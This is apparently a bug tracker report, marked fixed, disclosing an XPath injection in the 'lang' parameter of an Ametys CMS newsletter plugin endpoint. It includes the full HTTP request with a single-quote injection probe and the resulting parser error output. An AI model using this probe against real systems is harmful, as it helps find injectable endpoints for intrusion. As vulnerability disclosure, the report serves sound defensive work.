-
Bug
-
Resolution: Fixed
-
Major
-
3.5.1, 3.5.2
-
None
-
Win 7 Ultimate EN 32bit
Server: Jetty(6.1.21)
The POST parameter 'lang' is vulnerable to xpath injection vulnerability
--snip--
POST /cms/plugins/newsletter/category/nodes HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost:8080/cms/event/index.html
Content-Length: 137
Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root
Response:
org.apache.jackrabbit.spi.commons.query.xpath.ParseException
:
Encountered "\'//element(*, ametys:page)[@ametys-internal:tags =\'" at line 1, column 68.
Was expecting one of:
"or" ...
"and" ...
"div" ...
"idiv" ...
"mod" ...
"*" ...
"return" ...
"to" ...
"where" ...
"intersect" ...
"union" ...
"except" ...
<Instanceof> ...
<Castable> ...
"/" ...
"//" ...
"=" ...
"is" ...
...
--snip--